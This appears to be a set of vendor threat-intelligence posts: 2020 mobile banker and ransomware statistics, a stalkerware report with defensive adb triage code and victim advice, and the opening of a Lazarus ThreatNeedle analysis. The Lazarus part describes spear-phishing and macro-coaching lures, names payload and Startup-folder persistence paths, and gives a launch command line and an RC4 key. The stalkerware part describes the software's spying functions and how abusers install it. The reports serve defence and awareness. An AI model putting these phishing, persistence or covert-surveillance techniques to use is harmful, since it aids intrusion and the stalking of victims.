Gugi              1.45
Knobot            1.08

* Share of users attacked by the family of mobile bankers in total users attacked by mobile banking Trojans

Geography of mobile banker attacks in 2020

Top 10 countries by share of users attacked by mobile bankers

 #  Country*                  %**
 1  Japan                    2.83
 2  Taiwan Province, China   0.87
 3  Spain                    0.77
 4  Italy                    0.71
 5  Turkey                   0.60
 6  South Korea              0.34
 7  Russia                   0.25
 8  Tajikistan               0.21
 9  Poland                   0.17
10  Australia                0.15

* Excluded from the rankings are countries with fewer than 25,000 active users of Kaspersky mobile solutions in the reporting period.
** Unique users attacked by mobile bankers in the country as a percentage of all users of Kaspersky mobile solutions in the country.

Compared to 2019, the distribution of countries by number of users attacked by mobile bankers changed significantly. Russia (0.25%), which had ranked first for three years, dropped to seventh place. Japan (2.83%), where the aforementioned Wroba raged, ranked first. The situation was similar in Taiwan (0.87%), which ranked second in our Top 10. Third was Spain (0.77%), where the most popular bankers were Cebruser and Ginp.

Italy (0.71%) ranked fourth. The most common threats in that country were Cebruser and Knobot. In Turkey (0.60%), ranked fifth, users of Kaspersky security solutions most often encountered the Cebruser and Anubis families.

The most widespread banking trojan in Russia (0.25%) was Trojan-Banker.AndroidOS.Rotexy.e, followed by Svpeng.q and Asacub.snt.

Mobile ransomware Trojans

We found 20,708 installation packages for ransomware Trojans in 2020, 3.5 times fewer than in the previous year.

Ransomware Trojan installation packages in 2018 through 2020

Overall, the decrease in ransomware is most plausibly explained by attackers switching from ransomware to bankers, or combining the features of the two. Current versions of Android prevent applications from locking the screen, so even a successful ransomware infection yields the attackers little.

However, in the field of mobile ransomware, we were in for a nasty surprise.

Users attacked by mobile ransomware Trojans in 2019 and 2020

Whereas the beginning of 2020 saw a decrease in the number of users attacked by ransomware Trojans, we observed a spike in September, after which the indicator returned to July's figures.

Looking closer, we found that Trojan-Ransom.Win32.Encoder.jya was the most widespread ransomware in September. As the verdict shows, this malware is not designed for the Android platform at all: it is an encryptor that targets files on Windows workstations. How did it end up on mobile devices? The explanation is simple. In September, Encoder.jya spread via Telegram, which has both a mobile and a desktop client. The attackers were clearly targeting Windows users, while mobile users received the malware more or less by accident, because the mobile version of Telegram synced downloads with the desktop client. Once in the smartphone's memory, the malware was detected by Kaspersky security solutions. Files containing Encoder.jya were most often named 2-5368451284523288935.rar or AIDS NT.rar.
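Both the family-share tables above and the Encoder.jya case come down to reading Kaspersky's verdict strings, which follow the pattern Behaviour.Platform.Family.Variant (for example Trojan-Banker.AndroidOS.Rotexy.e). The Python below is an added example, not Kaspersky's own tooling: it parses such verdicts, recomputes a "share of attacked users per family" figure the way the table footnote defines it, and flags verdicts whose platform field does not match the reporting device, which is exactly how a Win32 encryptor ends up in Android statistics. The verdict format, the (user, verdict) event shape and the absence of prefixes such as "HEUR:" are this example's assumptions; the events are constructed, not telemetry.

```python
import re
from collections import defaultdict

# Kaspersky verdicts read Behaviour.Platform.Family[.variant], e.g.
# Trojan-Banker.AndroidOS.Rotexy.e, Monitor.AndroidOS.Nidb.a, Trojan-Ransom.Win32.Encoder.jya.
# Assumption of this example: no "HEUR:" or similar prefix in the input.
VERDICT_RE = re.compile(
    r"^(?P<behaviour>[A-Za-z]+(?:-[A-Za-z]+)*)\."
    r"(?P<platform>[A-Za-z0-9]+)\."
    r"(?P<family>[A-Za-z0-9_]+)"
    r"(?:\.(?P<variant>[A-Za-z0-9]+))?$"
)


def parse_verdict(name):
    """Split a verdict string into its four fields (variant may be None)."""
    m = VERDICT_RE.match(name)
    if not m:
        raise ValueError(f"unexpected verdict format: {name!r}")
    return m.groupdict()


def family_shares(events, behaviour):
    """Share of attacked users per family, defined as in the report's footnote:
    users hit by the family / all users hit by any verdict of that behaviour
    (e.g. "Trojan-Banker"), in percent. A user hit by two families is counted
    once in each family and once in the denominator, so shares can sum to >100."""
    per_family = defaultdict(set)
    attacked = set()
    for user, verdict in events:
        v = parse_verdict(verdict)
        if v["behaviour"] != behaviour:
            continue
        per_family[v["family"]].add(user)
        attacked.add(user)
    if not attacked:
        return {}
    return {fam: round(100.0 * len(users) / len(attacked), 2)
            for fam, users in per_family.items()}


def platform_mismatches(events, device_platform="AndroidOS"):
    """Verdicts whose platform field differs from the device that reported them,
    with the number of affected users. This is the Encoder.jya situation: a Win32
    encryptor synced onto phones by Telegram and detected there."""
    users_by_verdict = defaultdict(set)
    for user, verdict in events:
        if parse_verdict(verdict)["platform"] != device_platform:
            users_by_verdict[verdict].add(user)
    return {verdict: len(users) for verdict, users in users_by_verdict.items()}


# Constructed (user, verdict) detections reported by Android devices; not real telemetry.
SAMPLE_EVENTS = [
    ("u1", "Trojan-Banker.AndroidOS.Asacub.snt"),
    ("u2", "Trojan-Banker.AndroidOS.Asacub.snt"),
    ("u2", "Trojan-Banker.AndroidOS.Rotexy.e"),
    ("u3", "Trojan-Banker.AndroidOS.Svpeng.q"),
    ("u3", "Trojan-Ransom.Win32.Encoder.jya"),
    ("u4", "Trojan-Ransom.Win32.Encoder.jya"),
    ("u5", "Trojan-Ransom.AndroidOS.Small.n"),
]

if __name__ == "__main__":
    print(family_shares(SAMPLE_EVENTS, "Trojan-Banker"))
    print(platform_mismatches(SAMPLE_EVENTS))
```

Because a user hit by two families is counted once in each, the per-family shares can add up to more than 100%; the Top 10 banker table above sums to roughly 108% for the same reason, which is worth remembering before reading such a column as a partition.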

Geography of mobile ransomware attacks in 2020

Top 10 countries by share of users attacked by ransomware Trojans

    Country*        %**
 1  USA             2.25
 2  Kazakhstan      0.77
 3  Iran            0.35
 4  China           0.21
 5  Italy           0.14
 6  Canada          0.11
 7  Mexico          0.09
 8  Saudi Arabia    0.08
 9  Australia       0.08
10  Great Britain   0.07

* Excluded from the rankings are countries with fewer than 25,000 active users of Kaspersky mobile solutions in the reporting period.
** Unique users attacked by mobile ransomware in the country as a percentage of all users of Kaspersky mobile solutions in the country.

As in 2019, the United States was the country with the most attacked users (2.25%) in 2020. The most common family of mobile ransomware in the country was Svpeng. Kazakhstan (0.77%) ranked second again, Rkor being the most widespread ransomware in that country. Iran (0.35%) remained in third position in our Top 10. The most common type of mobile ransomware there was Trojan-Ransom.AndroidOS.Small.n.

Conclusion

The 2020 pandemic has affected every aspect of our lives, and the landscape of mobile threats has been no exception. We saw a decrease in the number of attacks in the first half of the year, which can be attributed to the confusion of the first months of the pandemic: the attackers had other things to worry about. They were back at it in the second half, though, and we saw an increase in attacks involving mobile bankers, such as Asacub and Wroba. Besides that, we saw stronger interest in banking data, both from criminal groups specializing in mass infections and from those who prefer to select their targets carefully. And this, too, was affected by the pandemic: the inability to visit a bank branch forced customers to switch to mobile and online banking, and banks, to consider stepping up the development of those services.

Another statistically interesting event was an increase in adware, with the Ewind family making a major contribution to this: we discovered more than 2,000,000 packages of the Ewind.kp variant alone. However, these volumes had little, if any, impact on attack statistics. Coupled with Ewind.kp developers’ reluctance to make changes to the core application code, this may indicate that they have opted for quantity over quality.

26 February 2021

The state of stalkerware in 2020

The state of stalkerware in 2020 (PDF)

Main findings

Kaspersky's data shows that the scale of the stalkerware problem did not improve much in 2020 compared with the previous year:

  • The number of people affected is still high. In total, 53,870 of our mobile users were affected globally by stalkerware in 2020. Keeping in mind the big picture, these numbers only include Kaspersky users, and the total global numbers will be higher. Some affected users may use another cybersecurity solution on their devices, while some do not use any solution at all.
  • With more than 8,100 users affected globally, Nidb is the most used stalkerware sample, according to our 2020 stats. This sample is used to sell a number of different stalkerware products such as iSpyoo, TheTruthSpy and Copy9 among others.
  • In terms of geographic spread, we see a largely consistent trend emerging: Russia, Brazil, and the United States of America (USA) remain the most affected countries globally, and they are the three leading countries in 2020.
  • In Europe, Germany, Italy and the United Kingdom (UK) are the top three most-affected countries respectively.
Introduction and methodology

Technology has enabled people to connect more than ever before. We can choose to digitally share our lives with our partner, family, and friends regardless of how far we are physically. Yet, we are also seeing a rise in software that enables users to remotely spy on another person’s life via their digital device, without the affected user giving their consent or being notified.

The software, known as stalkerware, is commercially available to everyone with access to the internet. The risks of stalkerware can go beyond the online sphere and enter the physical world. The Coalition Against Stalkerware warns that stalkerware “may facilitate intimate partner surveillance, harassment, abuse, stalking, and/or violence.” Stalkerware can also operate in stealth mode, meaning that there is no icon displayed on the device to indicate its presence and it is not visible to the affected user. The majority of affected users do not even know this type of software exists. This means they cannot protect themselves, online or offline, especially as the perpetrator using stalkerware usually knows their victim personally.

In recent years, Kaspersky has been actively working with partners to end the use of stalkerware. In 2019, we created a special alert that notifies users if stalkerware is installed on their phones. Following that we became one of ten founding members of the Coalition Against Stalkerware. We also published our first full report on the state of stalkerware in the same year to understand the scale of the problem.

This report continues to examine the issue of stalkerware and presents new statistics from 2020, in comparison to our previous data. The data in this report has been taken from aggregated threat statistics obtained from the Kaspersky Security Network. The Kaspersky Security Network is dedicated to processing cybersecurity-related data streams from millions of voluntary participants around the world. All received data is anonymized. To calculate our statistics, we review the consumer line of Kaspersky’s mobile security solutions.

The issue of, and the story behind, stalkerware

Stalkerware is software that is commercially available to everyone with access to the internet. It is used to spy remotely on another person via their device, without the affected user giving their consent or being notified. Stalkerware operates in stealth mode, meaning that there is no icon displayed on the device indicating its presence, and it is not visible to the affected user. Therefore, the Coalition Against Stalkerware defines stalkerware as software which “may facilitate intimate partner surveillance, harassment, abuse, stalking, and/or violence”.

The dimension of cyberviolence

According to a report by the European Institute for Gender Equality, "seven in ten women in Europe who have experienced cyberstalking have also experienced at least one form of physical and/or sexual violence from an intimate partner". Echoing these findings, experts from non-profit organizations (NPOs) that help domestic abuse survivors and victims emphasize that cyberstalking is also a form of violence. Just as with physical, psychological and economic violence, an abuser can use surveillance to obtain complete control of their victim/survivor[1] and stay in charge of the situation.

Using stalkerware, the extent of control held by the abuser can be immense. Depending on the type installed, stalkerware may have a variety of functions to intrude into the victim’s privacy. With the software’s help, an abuser can:

  • Read anything the surveilled person types – logging each keystroke on the device, including credentials to any kind of services such as banking applications, online shops and social networks, etc.
  • Know where they are – by tracking a person’s movements with GPS, in real time
  • Hear what they say – eavesdrop on calls, or even record them
  • Read messages on any messenger, regardless of whether encryption is used
  • Monitor social network activity
  • See photos and videos
  • Switch on the camera

All of this private information can be collected, usually from a mobile device, such as a tablet or a smartphone.

Non-profit organizations from the Coalition Against Stalkerware are experiencing a growing number of survivors seeking help with the problem:

  • Findings from the Second National Survey on technology abuse and domestic violence in Australia, launched by WESNET with the assistance of Dr. Delanie Woodlock and researchers from Curtin University, state that 99.3% of domestic violence practitioners have clients experiencing technology-facilitated abuse and that the use of video cameras increased by 183.2% between 2015 and 2020.
  • According to a study on cyberviolence in intimate relationships, conducted by the Centre Hubertine Auclert in France, 21% of victims have experienced stalkerware at the hands of their abusive partner, and 69% of victims have the feeling that the personal information on their smartphone has been accessed by their partner in a hidden way.
  • In Germany, for several years, Women’s Counselling Centers and Rape Crisis Centers (bff) have noticed an increasing use of stalkerware in conjunction with partner relationships.
  • In the USA, stalking impacts an estimated 6-7.5 million people over a one-year period, and one-in-four victims report being stalked through some form of technology, according to the Stalking Prevention Awareness & Resource Center (SPARC).
Physical access is the key

Unfortunately, it is not too difficult to secretly install stalkerware on a victim's phone. The main barrier is that stalkerware has to be configured on the affected device. Because these applications are distributed very differently from common malware, it is not possible to get infected with stalkerware through a spam message containing a link to it, or through a trap encountered during normal web browsing.

This means that the abuser needs physical access to the target device in order to install stalkerware. This is possible if the device has no PIN, pattern or password protecting it, or if the abuser knows the victim/survivor personally. Installation on the target device can be completed within a few minutes.

Prior to accessing the survivor’s device, the abuser has to collect a link to the installation package from the stalkerware developer’s webpage. In most cases, the software is not downloaded from an official application store. For Android devices, Google banned applications that are clearly stalkerware from its Google Play application store in 2020. This means the abuser will not be able to install such an application from the general app store. Instead, the abuser must follow several steps before being able to install stalkerware. As a result, the abuser may leave traces in the device settings that a user can check if they are concerned they may be being spied on.

Stalkerware tools are less frequent on iPhones than on Android devices because iOS is traditionally a closed system. However, perpetrators can work around this limitation on jailbroken iPhones. They still need physical access to the phone to jailbreak it, so iPhone users who fear surveillance should always keep an eye on their device. Alternatively, an abuser can offer their victim an iPhone – or any other device – with pre-installed stalkerware as a gift. There are many companies who make their services available online to install such tools on a new phone and deliver it to an unwitting addressee in factory packaging to celebrate a special occasion.

The risk of privacy leaks

The information monitored via stalkerware is available to at least one person: the abuser who installed the stalkerware on the survivor's phone. Sometimes, however, all of the private data may become publicly available. Year after year, stalkerware servers are either hacked or left openly unprotected, so that the information can be accessed and leaked online. For example, in 2020 such a data breach occurred in a product provided by ClevGuard. In previous years, we saw similar incidents with Mobiispy in 2019 and with MSpy in 2018 and 2015.

These are just a few examples of a long list in which databases from companies developing stalkerware have been exposed, affecting millions of user accounts. With the possibility to track a person’s location, it means that not only their cyberprivacy is lost but also their security in the physical world may be at risk.

The legal status

Stalkerware applications are sold and provided by companies under various facades, such as child monitoring or employee tracking solutions. While laws vary from one country and state to another, they are catching up. Generally speaking, using such tools and apps is illegal only where they record a user's activity without that user's consent or legal authorization. Slowly, we are seeing some shifts in legislation. For instance, in 2020, France reinforced sanctions on secret surveillance: geolocating someone without their consent is now punishable by one year's imprisonment and a fine of 45,000 euros. If this is done within a couple, the sanctions are potentially higher, with two years' imprisonment and a fine of 60,000 euros.

Stalkerware tools often violate laws and expose the stalker to legal liability for any recordings made without the victim’s knowledge. Stalkers must realize that they are breaking the law. If the use of stalkerware is reported, the punishment applies to the private perpetrator who installed the software – not its vendor. In the USA, only two stalking app developers have been fined in recent history. One had to pay a record 500,000 US dollar fine, which put an end to the app development process, while the other got off with an order to change the app’s functionality for future sales.

The scale of the issue

Global detection figures – affected users

In this section, we look at the global numbers of unique users whose mobile device was found to have stalkerware detected.

The 2020 data shows that the stalkerware situation has not improved much: the number of affected people is still high. A total of 53,870 unique users were affected globally by stalkerware in 2020, compared with 66,927 unique users in 2019. However, it must be taken into account that 2020 was an unprecedented year in which lives changed dramatically across the globe.

To fight the COVID-19 pandemic, countries around the world imposed massive restrictions, such as self-isolation measures or lockdowns, in order to keep people at home. Considering that stalkerware is one more tool for controlling an intimate partner whom the abuser lives with and sees every day, this can explain the somewhat lower numbers compared with the previous year.

Unique users affected by stalkerware globally from 2018 until 2020 – total per year

When looking at the total number of unique users affected by stalkerware worldwide per month in 2020, this trend becomes even more noticeable. The first two months of the year were stable, with many affected devices, showing that stalkerware remained quite popular. The situation changed in March, when many countries announced quarantine measures. The curve shows the numbers beginning to stabilize as of June 2020, when many countries around the world eased restrictions.

Unique users affected by stalkerware in 2020 worldwide – total by month

That said, the 2020 numbers remain at a high, stable level. In comparison, in 2018, 40,173 unique users were affected globally by stalkerware. This puts the 2020 total into perspective, given how much more technology has become integrated into our lives since then. Sadly, it also means that software used for stalking is becoming more common as another form of intimate partner violence.

Global detection figures – stalkerware samples

In this section, we analyze which stalkerware samples are actually the most used to control mobile devices on a global level. The most detected samples in 2020 are listed below.

Top 10 most detected stalkerware samples globally

     Sample                                 Affected users
  1  Monitor.AndroidOS.Nidb.a                 8147
  2  Monitor.AndroidOS.Cerberus.a             5429
  3  Monitor.AndroidOS.Agent.af               2727
  4  Monitor.AndroidOS.Anlost.a               2234
  5  Monitor.AndroidOS.MobileTracker.c        2161
  6  Monitor.AndroidOS.PhoneSpy.b             1774
  7  Monitor.AndroidOS.Agent.hb               1463
  8  Monitor.AndroidOS.Cerberus.b             1310
  9  Monitor.AndroidOS.Reptilic.a             1302
 10  Monitor.AndroidOS.SecretCam.a            1124
  1. With more than 8,100 users having been affected by it, Nidb was the most used stalkerware sample in 2020. The Nidb creator sells their product as Stalkerware as a Service. This means that anyone could rent their control server software and mobile application, rename it to any suitable marketing name and sell it separately—examples of this include iSpyoo, TheTruthSpy, Copy9, and others.
  2. Both second and eighth place are occupied by Cerberus. These are two different samples under the same family. Variant Cerberus.a affected more than 5,400 users.
  3. Agent.af comes in third place, with more than 2,700 users having been affected. This is marketed as Track My Phone and has typical features such as reading messages from any messenger, logging a person’s call history, and tracking geolocation.
  4. Anlost.a is a good example of stalkerware in disguise. It is advertised as an anti-theft application, and its icon is present on the home screen (unusual behavior for stealthy stalkerware apps), which is why it is available on the Google Play Store. That said, the icon can be deliberately hidden from the home screen. One of the application's key functions is intercepting SMS messages and reading the call log. More than 2,200 users were affected by this sample.
  5. MobileTracker.c has several functions, such as intercepting messages from popular social networks and taking remote control of the affected device. More than 2,100 users were affected by this sample.
  6. PhoneSpy is also known as Spy Phone app or Spapp Monitoring. This application consists of many spy features, covering all popular instant messengers and social networks.
  7. Agent.hb is another version of MobileTracker. Like the original version, it offers many functionalities.
  8. Cerberus.b is a different sample from the same family as Cerberus.a.
  9. Reptilic.a is stalkerware that includes many features such as social media monitoring, call recordings, and browser history monitoring.
  10. SecretCam.a is camera stalking software, meaning it is able to secretly record video from the front or back camera of the affected device.
Geography of affected users

Stalkerware is a global phenomenon that affects countries regardless of size, society or culture. When looking at the top 10 affected countries worldwide in 2020, Kaspersky's findings show that largely the same countries remain the most affected, with Russia in the number one spot. Yet we see an increase in stalkerware activity in Brazil and the USA in 2020 compared with 2019. However, we detected fewer incidents in India, which has fallen in the rankings. We also detected a higher number of incidents in Mexico, which has risen two places in the ranking.

Top 10 most affected countries by stalkerware – globally

     Country                    Affected users
  1  Russian Federation         12389
  2  Brazil                      6523
  3  United States of America    4745
  4  India                       4627
  5  Mexico                      1570
  6  Germany                     1547
  7  Iran                        1345
  8  Italy                       1144
  9  United Kingdom              1009
 10  Saudi Arabia                 968

When considering Europe, Germany, Italy and the UK are the three most affected countries, in that order. They are followed by France in fourth place and Spain in fifth place.

Top 10 most affected countries by stalkerware – Europe

     Country           Affected users
  1  Germany           1547
  2  Italy             1144
  3  United Kingdom    1009
  4  France             904
  5  Spain              873
  6  Poland             444
  7  Netherlands        321
  8  Romania            222
  9  Belgium            180
 10  Austria            153

How to check if a mobile device has stalkerware installed

It is hard for everyday users to know whether stalkerware is installed on their devices. Generally, this type of software stays hidden: the app's icon is concealed on the home screen and in the phone menu, and any traces it leaves are cleaned up. However, it may give itself away, and there are some warning signs. Among the most important are:

  • Keep an eye out for a fast-draining battery, constant overheating and growing mobile data traffic.
  • Run regular antivirus scans on your Android device. If the security solution detects stalkerware, do not rush to remove it, as the abuser may notice. Have a safety plan in place and reach out to a local help organization.
  • Check the browser history: to download stalkerware, the abuser has to visit web pages that the affected user does not know about. Alternatively, there may be no history at all if the abuser wiped it.
  • Check the "unknown sources" setting: if "unknown sources" is enabled on your device, it may be a sign that unwanted software was installed from a third-party source.
  • Check the permissions of installed apps: a stalkerware application may be disguised under a misleading name while holding suspicious access to messages, call logs, location and other personal activity.

However, it’s also important to understand that warning signs or symptoms are not necessarily proof that stalkerware is installed on a device.
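The warning signs listed above can be checked mechanically on a device with USB debugging enabled. The Python below is an added example, not Kaspersky's tooling and not TinyCheck: it pulls three things over adb (third-party packages with their installer, which packages expose a launcher icon, and the permissions each package has been granted) and reports packages that combine at least two signs: sideloaded (installer is not the Play Store), no launcher icon, and several spying-grade permissions. Since Android 8 the global "unknown sources" toggle has been replaced by per-app install permissions, so the example keys on installer attribution instead of that setting. The permission list, the two-signs threshold and the adb invocation are this example's choices, and the sample adb output is constructed so the logic runs offline.

```python
import re
import subprocess

# Permissions that give an app stalkerware-grade reach. This list is the example's
# own choice, not Kaspersky's detection criteria.
SENSITIVE = {
    "android.permission.READ_SMS",
    "android.permission.RECEIVE_SMS",
    "android.permission.READ_CALL_LOG",
    "android.permission.RECORD_AUDIO",
    "android.permission.CAMERA",
    "android.permission.ACCESS_FINE_LOCATION",
    "android.permission.ACCESS_BACKGROUND_LOCATION",
    "android.permission.READ_CONTACTS",
}
PLAY_STORE = "com.android.vending"


def parse_installed(pm_output):
    """Parse `pm list packages -3 -i` (third-party packages with their installer).
    Lines look like `package:com.foo  installer=com.android.vending`; a sideloaded
    app reports installer=null, which becomes None here."""
    pkgs = {}
    for line in pm_output.splitlines():
        m = re.match(r"package:(\S+)\s+installer=(\S+)", line.strip())
        if m:
            pkgs[m.group(1)] = None if m.group(2) == "null" else m.group(2)
    return pkgs


def parse_launcher_packages(query_output):
    """Packages that expose a MAIN/LAUNCHER activity, i.e. show a home-screen icon.
    Input is `cmd package query-activities --brief -a android.intent.action.MAIN
    -c android.intent.category.LAUNCHER`, whose lines read `com.foo/.MainActivity`."""
    return set(re.findall(r"([A-Za-z0-9_.]+)/[A-Za-z0-9_.$]+", query_output))


def parse_granted(dumpsys_output):
    """Granted permissions from `dumpsys package <pkg>` (install and runtime sections)."""
    return set(re.findall(r"(android\.permission\.[A-Z_]+): granted=true", dumpsys_output))


def assess(pkg, installer, launcher_pkgs, granted):
    """Warning signs for one package. Two or more are needed before it is reported:
    a single sign is not proof, as the caveat above says."""
    reasons = []
    if installer != PLAY_STORE:
        reasons.append("sideloaded (installer=%s)" % (installer or "null"))
    if pkg not in launcher_pkgs:
        reasons.append("no launcher icon")
    hits = sorted(p.rsplit(".", 1)[1] for p in granted & SENSITIVE)
    if len(hits) >= 2:
        reasons.append("sensitive permissions: " + ", ".join(hits))
    return reasons if len(reasons) >= 2 else []


def triage(pm_output, query_output, dumpsys_by_pkg):
    """Map flagged package -> reasons, from the raw text of the three adb commands."""
    launcher = parse_launcher_packages(query_output)
    flagged = {}
    for pkg, installer in parse_installed(pm_output).items():
        reasons = assess(pkg, installer, launcher, parse_granted(dumpsys_by_pkg.get(pkg, "")))
        if reasons:
            flagged[pkg] = reasons
    return flagged


def adb(*args):
    """Run an `adb shell` command; assumes adb is on PATH and one device is attached."""
    return subprocess.run(["adb", "shell", *args], capture_output=True, text=True, check=True).stdout


def live_triage():
    pm = adb("pm", "list", "packages", "-3", "-i")
    query = adb("cmd", "package", "query-activities", "--brief",
                "-a", "android.intent.action.MAIN", "-c", "android.intent.category.LAUNCHER")
    dumps = {pkg: adb("dumpsys", "package", pkg) for pkg in parse_installed(pm)}
    return triage(pm, query, dumps)


# Constructed adb output (not captured from a real device) so the logic runs offline.
SAMPLE_PM = "package:com.example.notes  installer=com.android.vending\npackage:com.sys.update  installer=null\n"
SAMPLE_QUERY = "com.example.notes/.MainActivity\ncom.android.settings/.Settings\n"
SAMPLE_DUMPSYS = {
    "com.example.notes": "    android.permission.CAMERA: granted=true\n",
    "com.sys.update": ("    android.permission.READ_SMS: granted=true\n"
                       "    android.permission.READ_CALL_LOG: granted=true\n"
                       "    android.permission.ACCESS_FINE_LOCATION: granted=true\n"
                       "    android.permission.RECORD_AUDIO: granted=true\n"
                       "    android.permission.INTERNET: granted=true\n"),
}

if __name__ == "__main__":
    for pkg, reasons in triage(SAMPLE_PM, SAMPLE_QUERY, SAMPLE_DUMPSYS).items():
        print(pkg, "->", "; ".join(reasons))
```

Run `live_triage()` against the device to get the same report from real output. Read the result the way the text above advises: a flagged package is a reason to look closer and to plan safely, not a confirmed finding, and removing it in a hurry may alert the abuser.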

How to minimize the risk

There are a few pieces of advice that can help to increase your digital safety:

  • Never lend your phone to anyone without watching what is done with it, and never leave it unlocked.*
  • Use a complex lock screen password and change passwords on a regular basis.
  • Do not disclose your password to anyone – not even your intimate partner or family members or close friends.*
  • Check your phone regularly: delete apps you don't use and review the permissions granted to each app.
  • Disable the option of third-party application installation on Android devices.
  • Protect your Android devices with a cyber-security solution, such as Kaspersky Internet Security for Android (free), which detects stalkerware and issues warnings.

*In the context of domestic violence and abusive relationships it may be difficult or even impossible to deny the abusive partner access to the phone.

Kaspersky’s activities and contribution to end cyberviolence

Kaspersky is actively working to end the use of cyberviolence and stalkerware, as a company and together with many other partners. In 2019, we created a special alert that notifies users when stalkerware is installed on their phones. In the same year, with nine other founding members, we created the Coalition Against Stalkerware. In 2020, we created TinyCheck, a free tool to detect stalkerware on mobile devices, aimed specifically at service organizations working with victims of domestic violence. TinyCheck can be found at https://github.com/KasperskyLab/TinyCheck. Since 2021, we have been one of five partners in DeStalk, an EU-wide project aimed at tackling gender-based cyberviolence and stalkerware, which the European Commission chose to support with its Rights, Equality and Citizenship Program.

About the Coalition Against Stalkerware

The Coalition Against Stalkerware ("CAS" or "Coalition") is a group dedicated to addressing abuse, stalking and harassment via the creation and use of stalkerware. Launched in November 2019, the Coalition Against Stalkerware gained 26 partners in its first year. These include the founding partners: Avira, Electronic Frontier Foundation, the European Network for the Work with Perpetrators of Domestic Violence, G DATA Cyber Defense, Kaspersky, Malwarebytes, The National Network to End Domestic Violence, NortonLifeLock, Operation Safe Escape and WEISSER RING. The Coalition looks to bring together a diverse array of organizations to actively address the criminal behavior perpetrated through stalkerware and to increase public awareness of this important issue. Given the high societal relevance for users all over the globe and the new variants of stalkerware that emerge periodically, the Coalition Against Stalkerware is open to new partners and calls for cooperation. To find out more about the Coalition Against Stalkerware, please visit the official website www.stopstalkerware.org.

[1] Experts refer in their terminology more and more to the empowering term survivor instead of victim. Hence, in this report, we will use both terms.

25 February 2021

Lazarus targets defense industry with ThreatNeedle

Lazarus targets defense industry with ThreatNeedle (PDF)

We named Lazarus the most active group of 2020. We’ve observed numerous activities by this notorious APT group targeting various industries. The group has changed target depending on the primary objective. Google TAG has recently published a post about a campaign by Lazarus targeting security researchers. After taking a closer look, we identified the malware used in those attacks as belonging to a family that we call ThreatNeedle. We have seen Lazarus attack various industries using this malware cluster before. In mid-2020, we realized that Lazarus was launching attacks on the defense industry using the ThreatNeedle cluster, an advanced malware cluster of Manuscrypt (a.k.a. NukeSped). While investigating this activity, we were able to observe the complete life cycle of an attack, uncovering more technical details and links to the group’s other campaigns.

The group made use of COVID-19 themes in its spear-phishing emails, embellishing them with personal information gathered using publicly available sources. After gaining an initial foothold, the attackers gathered credentials and moved laterally, seeking crucial assets in the victim environment. We observed how they overcame network segmentation by gaining access to an internal router machine and configuring it as a proxy server, allowing them to exfiltrate stolen data from the intranet network to their remote server. So far organizations in more than a dozen countries have been affected.

During this investigation we had a chance to look into the command-and-control infrastructure. The attackers configured multiple C2 servers for various stages, reusing several scripts we’ve seen in previous attacks by the group. Moreover, based on the insights so far, it was possible to figure out the relationship with other Lazarus group campaigns.

The full article is available on Kaspersky Threat Intelligence.
For more information please contact: ics-cert@kaspersky.com

Initial infection

In this attack, spear phishing was used as the initial infection vector. Before launching the attack, the group studied publicly available information about the targeted organization and identified email addresses belonging to various departments of the company.

Email addresses in those departments received phishing emails that either had a malicious Word document attached or a link to one hosted on a remote server. The phishing emails claimed to have urgent updates on today’s hottest topic – COVID-19 infections. The phishing emails were carefully crafted and written on behalf of a medical center that is part of the organization under attack.

Phishing email with links to malicious documents

The attackers registered accounts with a public email service, making sure the sender’s email addresses looked similar to the medical center’s real email address. The signature shown in the phishing emails included the actual personal data of the deputy head doctor of the attacked organization’s medical center. The attackers were able to find this information on the medical center’s public website.

A macro in the Microsoft Word document contained the malicious code designed to download and execute additional malicious software on the infected system.

The document contains information on the population health assessment program and is not directly related to the subject of the phishing email (COVID-19), suggesting the attackers may not completely understand the meaning of the contents they used.

Contents of malicious document

The content of the lure document was copied from an online post by a health clinic.

Our investigation showed that the initial spear-phishing attempt was unsuccessful due to macros being disabled in the Microsoft Office installation of the targeted systems. In order to persuade the target to allow the malicious macro, the attacker sent another email showing how to enable macros in Microsoft Office.

Email with instructions on enabling macros #1

After sending the above email with explanations, the attackers realized that the target was using a different version of Microsoft Office and therefore required a different procedure for enabling macros. The attackers subsequently sent another email showing the correct procedure in a screenshot with a Russian language pack.

Email with instructions on enabling macros #2

The content in the spear-phishing emails sent by the attackers from May 21 to May 26, 2020, did not contain any grammatical mistakes. However, in subsequent emails the attackers made numerous errors, suggesting they may not be native Russian speakers and were using translation tools.

Email containing several grammatical mistakes

On June 3, 2020, one of the malicious attachments was opened by employees and at 9:30 am local time the attackers gained remote control of the infected system.

This group also utilized different types of spear-phishing attacks. One of the compromised hosts received several spear-phishing documents on May 19, 2020. The malicious file that was delivered, named Boeing_AERO_GS.docx, fetches a template from a remote server.

However, no payload created by this malicious document could be discovered. We speculate that the infection from this malicious document failed for a reason unknown to us. A few days later, the same host opened a different malicious document. The threat actor wiped these files from disk after the initial infection, meaning they could not be obtained.

Nonetheless, a related malicious document with this malware was retrieved based on our telemetry. It creates a payload and shortcut file and then continues executing the payload by using the following command line parameters.

  • Payload path: %APPDATA%\Microsoft\Windows\lconcaches.db
  • Shortcut path: %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\OneDrives.lnk
  • Command line (note that the string at the end is hard-coded, but different for each sample):
  • exe [dllpath],Dispatch n2UmQ9McxUds2b29

The content of the decoy document depicts the job description of a generator/power industry engineer.

Decoy document

Malware implants

Upon opening a malicious document and allowing the macro, the malware is dropped and proceeds to a multistage deployment procedure. The malware used in this campaign belongs to a known malware cluster we named ThreatNeedle. We attribute this malware family to the advanced version of Manuscrypt (a.k.a. NukeSped), a family belonging to the Lazarus group. We previously observed the Lazarus group utilizing this cluster when attacking cryptocurrency businesses and a mobile game company. Although the malware involved and the entire infection process is known and has not changed dramatically compared to previous findings, the Lazarus group continued using ThreatNeedle malware aggressively in this campaign.

Infection procedure

The payload created by the initial spear-phishing document loads the next stage as a backdoor running in-memory – the ThreatNeedle backdoor. ThreatNeedle offers functionality to control infected victims. The actor uses it to carry out initial reconnaissance and deploy additional malware for lateral movement. When moving laterally, the actor uses ThreatNeedle installer-type malware in the process. This installer is responsible for implanting the next stage loader-type malware and registering it for auto-execution in order to achieve persistence. The ThreatNeedle loader-type malware exists in several variations and serves the primary purpose of loading the final stage of the ThreatNeedle malware in-memory.

ThreatNeedle installer

Upon launch, the malware decrypts an embedded string using RC4 (key: B6 B7 2D 8C 6B 5F 14 DF B1 38 A1 73 89 C1 D2 C4) and compares it to “7486513879852”. If the user executes this malware without a command line parameter, the malware launches a legitimate calculator carrying a dark icon of the popular Avengers franchise.

